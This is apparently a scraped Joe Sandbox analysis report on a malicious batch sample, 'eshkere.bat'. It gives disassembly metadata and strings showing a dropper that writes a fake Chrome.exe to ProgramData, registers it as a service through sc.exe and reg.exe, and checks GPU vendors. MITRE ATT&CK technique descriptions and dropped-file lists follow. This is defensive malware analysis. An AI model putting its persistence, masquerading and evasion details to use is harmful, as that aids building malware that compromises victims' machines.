\BaseNamedObjects\vxmklory, xrefs: 0000000140003377
PROGRAMDATA=, xrefs: 00000001400038A5, 0000000140003B3D
\BaseNamedObjects\wzaaradbbanhjyiuzqingyiz, xrefs: 0000000140005028
AMD, xrefs: 000000014000443B
\WindowsPowerShell\v1.0\powershell.exe, xrefs: 0000000140003814
\reg.exe, xrefs: 0000000140003CC7
\Registry\Machine\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\, xrefs: 0000000140003EB7, 00000001400060AC
\Registry\Machine\SYSTEM\CurrentControlSet\Services\Chrome, xrefs: 0000000140004DBD
Advanced Micro Devices, xrefs: 000000014000425A
\Chrome.exe, xrefs: 0000000140003C3E
, xrefs: 00000001400059E6
\sc.exe, xrefs: 0000000140003D3D
\System32, xrefs: 0000000140003643
\cmd.exe, xrefs: 00000001400036C6
SYSTEMROOT=, xrefs: 000000014000350F, 0000000140003528
, xrefs: 00000001400046C7

Memory Dump Source

Source File: 0000002F.00000002.3883472118.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000002F.00000002.3883446602.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3883494695.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3883515683.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3883531158.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_140000000_conhost.jbxd

Similarity

API ID: memsetwcslen$wcscatwcscpy$_wcsnicmp
String ID: $ $AMD$ATI$Advanced Micro Devices$ImagePath$NVIDIA$PROGRAMDATA=$ProviderName$SYSTEMROOT=$Start$\??\$\??\$\BaseNamedObjects\vxmklory$\BaseNamedObjects\wzaaradbbanhjyiuzqingyiz$\BaseNamedObjects\zvephrvenfzrpfqs$\Chrome.exe$\Registry\Machine\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\$\Registry\Machine\SYSTEM\CurrentControlSet\Services\Chrome$\System32$\WindowsPowerShell\v1.0\powershell.exe$\cmd.exe$\reg.exe$\sc.exe
API String ID: 3506639089-1164981747
Opcode ID: f9f00584740f326b0651aa11fe350e4e628a7d90e96a58d678bb832e4801c0d4
Instruction ID: b07b20a1427e0a2d1bb55387612dda4660aaab1b0858772cfc3d8ceca331e793
Opcode Fuzzy Hash: f9f00584740f326b0651aa11fe350e4e628a7d90e96a58d678bb832e4801c0d4
Instruction Fuzzy Hash: AC433AF1524AC198F323DF2AF8457E563A0BB9E3C8F445216FB84676B2EB794285C305

Function 00000001400027D0 Relevance: 23.1, APIs: 9, Strings: 4, Instructions: 376
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 0000000140002810
wcsncmp.MSVCRT ref: 00000001400029E4
memset.MSVCRT ref: 0000000140002AAC
wcscpy.MSVCRT ref: 0000000140002B15
wcscat.MSVCRT ref: 0000000140002B20
wcslen.MSVCRT ref: 0000000140002B28
wcslen.MSVCRT ref: 0000000140002B40
wcslen.MSVCRT ref: 0000000140002BA0
wcslen.MSVCRT ref: 0000000140002BF2

Strings

\BaseNamedObjects\zvephrvenfzrpfqs, xrefs: 00000001400027D8
X, xrefs: 0000000140002D83
`, xrefs: 0000000140002D9B
0, xrefs: 00000001400029E9

Memory Dump Source

Source File: 0000002F.00000002.3883472118.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000002F.00000002.3883446602.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3883494695.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3883515683.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3883531158.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_140000000_conhost.jbxd

Similarity

API ID: wcslen$memset$wcscatwcscpywcsncmp
String ID: 0$X$\BaseNamedObjects\zvephrvenfzrpfqs$`
API String ID: 780471329-1565225789
Opcode ID: d06ff198b9adf04d2293b3933f1008c9007d93146ac6b43991ebde6bbab559d8
Instruction ID: 288012cf14065c2f391846a3ab3d30113bdb4d4bb9c282988a20f83871f53ef7
Opcode Fuzzy Hash: d06ff198b9adf04d2293b3933f1008c9007d93146ac6b43991ebde6bbab559d8
Instruction Fuzzy Hash: EA126CB2618BC081E762CB26F8443EAB7A4F789794F418215EBA957BF5DF78C185C700

Function 0000000140001160 Relevance: 13.6, APIs: 9, Instructions: 130
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(?,?,?,0000000140001156), ref: 00000001400011A5
_amsg_exit.MSVCRT(?,?,?,0000000140001156), ref: 00000001400011CC
_initterm.MSVCRT ref: 000000014000120F
SetUnhandledExceptionFilter.KERNEL32(?,?,?,0000000140001156), ref: 000000014000124E
malloc.MSVCRT ref: 000000014000127E
strlen.MSVCRT ref: 00000001400012A4
malloc.MSVCRT ref: 00000001400012B0
memcpy.MSVCRT ref: 00000001400012C3
_cexit.MSVCRT(?,?,?,0000000140001156), ref: 000000014000132D

Memory Dump Source

Source File: 0000002F.00000002.3883472118.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000002F.00000002.3883446602.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3883494695.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3883515683.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3883531158.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_140000000_conhost.jbxd

Similarity

API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
String ID:
API String ID: 2643109117-0
Opcode ID: baa7c4cbecdde1a77dbd54a449249007eed9c0f89ee8769e77dfeb6f93e6c214
Instruction ID: afe468c82ee21520ab5432c45d5df99f9e7bb2e51abf512e96f833b76cc36b7a
Opcode Fuzzy Hash: baa7c4cbecdde1a77dbd54a449249007eed9c0f89ee8769e77dfeb6f93e6c214
Instruction Fuzzy Hash: 375133B1601A4085FB17EF27F9943EA27A5BB8CBD0F409121FB4E877B2DE3884958700

Function 0000000140001BA0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 106
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualQuery.KERNEL32(?,?,?,?,0000000140007DBC,0000000140007DBC,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001C63
VirtualProtect.KERNEL32(?,?,?,?,0000000140007DBC,0000000140007DBC,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001CC7
memcpy.MSVCRT ref: 0000000140001CE0
GetLastError.KERNEL32(?,?,?,?,0000000140007DBC,0000000140007DBC,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001D23

Strings

Address %p has no image-section, xrefs: 0000000140001CF4
VirtualQuery failed for %d bytes at address %p, xrefs: 0000000140001D17
VirtualProtect failed with code 0x%x, xrefs: 0000000140001D29

Memory Dump Source

Source File: 0000002F.00000002.3883472118.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000002F.00000002.3883446602.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3883494695.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3883515683.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3883531158.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_140000000_conhost.jbxd

Similarity

API ID: Virtual$ErrorLastProtectQuerymemcpy
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
API String ID: 2595394609-2123141913
Opcode ID: df7238d79fa2d2807d12a3721f02e952cb70ce12e34742303a71ae7989f1f348
Instruction ID: 3e7b5ecd0f9ab9c5b6f3dbc83d536faacc7d2f1bcfce1c54eb7915199dcf8083
Opcode Fuzzy Hash: df7238d79fa2d2807d12a3721f02e952cb70ce12e34742303a71ae7989f1f348
Instruction Fuzzy Hash: 444132B1201A4486FA66DF57F884BE927A0F78DBC4F558126EF0E877B1DA38C586C700

Function 0000000140002104 Relevance: 9.1, APIs: 6, Instructions: 51
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32 ref: 0000000140002118
TlsGetValue.KERNEL32 ref: 000000014000214F
GetLastError.KERNEL32 ref: 0000000140002154
LeaveCriticalSection.KERNEL32 ref: 0000000140002212
free.MSVCRT ref: 0000000140002234
DeleteCriticalSection.KERNEL32 ref: 000000014000225D

Memory Dump Source

Source File: 0000002F.00000002.3883472118.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000002F.00000002.3883446602.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3883494695.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3883515683.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3883531158.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_140000000_conhost.jbxd

Similarity

API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
String ID:
API String ID: 3326252324-0
Opcode ID: 672952b90304c9560e718319ab6be91a0d91d1b34b3c94dd1f916c2f21b526cc
Instruction ID: 8053d85934c412e1c454606f1f150af2342a590d3bb9918810e374f3e359275e
Opcode Fuzzy Hash: 672952b90304c9560e718319ab6be91a0d91d1b34b3c94dd1f916c2f21b526cc
Instruction Fuzzy Hash: 9A21F8B0305A0192FA6BDB53F9483E92360B76CBD0F448421EF1A47AB4DB79C98AC300

Function 0000000140001E10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

CCG , xrefs: 0000000140001E27

Memory Dump Source

Source File: 0000002F.00000002.3883472118.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000002F.00000002.3883446602.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3883494695.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3883515683.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3883531158.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_140000000_conhost.jbxd

Similarity

API ID:
String ID: CCG
API String ID: 0-1584390748
Opcode ID: 38169c844ed26cb13454801cef406e8a94d00939990f7d78723699de957bd425
Instruction ID: 4d6f217dfeb6d9e17f7c3982d90ffc55239669622623fea9138ee2928b50566b
Opcode Fuzzy Hash: 38169c844ed26cb13454801cef406e8a94d00939990f7d78723699de957bd425
Instruction Fuzzy Hash: A3214CB1B0161542FA77DA2BF5903FA1192ABCD7E4F258535FF1A473F5DE3888828241

Function 0000000140001880 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001247), ref: 00000001400019F9

Strings

Unknown pseudo relocation bit size %d., xrefs: 0000000140001B7B
Unknown pseudo relocation protocol version %d., xrefs: 0000000140001B8B

Memory Dump Source

Source File: 0000002F.00000002.3883472118.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000002F.00000002.3883446602.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3883494695.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3883515683.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3883531158.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_140000000_conhost.jbxd

Similarity

API ID: ProtectVirtual
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
API String ID: 544645111-395989641
Opcode ID: 549065ebbaaacac7af01a02dac067995769743cefac2621fb67829ca21da6e66
Instruction ID: 7b158fb3713a3061293f9ea4dfc1a1b5cc6f81aa9114ce7ea307f59c52e97846
Opcode Fuzzy Hash: 549065ebbaaacac7af01a02dac067995769743cefac2621fb67829ca21da6e66
Instruction Fuzzy Hash: D15115B6B11544DAEB12CF67F841BD82761A759BE8F548211FB1D077B4DB38C586C700

Function 0000000140001800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

fprintf.MSVCRT ref: 000000014000185A

Strings

Unknown error, xrefs: 0000000140001824
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 000000014000184D

Memory Dump Source

Source File: 0000002F.00000002.3883472118.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000002F.00000002.3883446602.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3883494695.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3883515683.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3883531158.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_140000000_conhost.jbxd

Similarity

API ID: fprintf
String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-3474627141
Opcode ID: 5a4655e5f7d9bc7fa14c795a7f63c94cd929b5219b64bcdb3273f472a942e7dc
Instruction ID: 16811f742f11ff20b59475e39225b65b732edfb60784bdb26f76ef83c73ed472
Opcode Fuzzy Hash: 5a4655e5f7d9bc7fa14c795a7f63c94cd929b5219b64bcdb3273f472a942e7dc
Instruction Fuzzy Hash: 25F09671A14A4482E612EF6AB9417ED6361E75D7C1F50D211FF4E676A1DF3CD182C310

Function 000000014000219E Relevance: 5.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32 ref: 00000001400021B2
TlsGetValue.KERNEL32 ref: 00000001400021EB
GetLastError.KERNEL32 ref: 00000001400021F0
LeaveCriticalSection.KERNEL32 ref: 000000014000226C

Memory Dump Source

Source File: 0000002F.00000002.3883472118.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000002F.00000002.3883446602.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3883494695.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3883515683.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3883531158.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_140000000_conhost.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeaveValue
String ID:
API String ID: 682475483-0
Opcode ID: d9f1a7fb7d620c15ffea2ce02aacef8734a5e410c6aecfc4b1b8398fb1dfb3d8
Instruction ID: 2f34ca9de4f01c93604b96efa8ab876b374c4069194b8a7974a56712bffd5862
Opcode Fuzzy Hash: d9f1a7fb7d620c15ffea2ce02aacef8734a5e410c6aecfc4b1b8398fb1dfb3d8
Instruction Fuzzy Hash: 1101B6B5705A0192FA67DB53FD083D86360B76CBD1F458421EF1A53AB4DB75C99AC300

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Tactics:	Defense Evasion
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report eshkere.bat

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Initial Sample

PCAP (Network Traffic)

Memory Dumps

Other

Sigma Signatures

System Summary

HIPS / PFW / Operating System Protection Evasion

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Bitcoin Miner

Compliance

Software Vulnerabilities

Networking

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Chrome.exe

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\1348.exe

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aidyod01.phk.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d40aw3j0.bta.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_elhhx1av.bhd.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gay0ae0w.aip.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mzu3hwdv.fdf.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_og2z4uv5.rzp.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ygtrmnw4.yrk.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zmmirluw.g1a.ps1

Windows Analysis Report
eshkere.bat

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
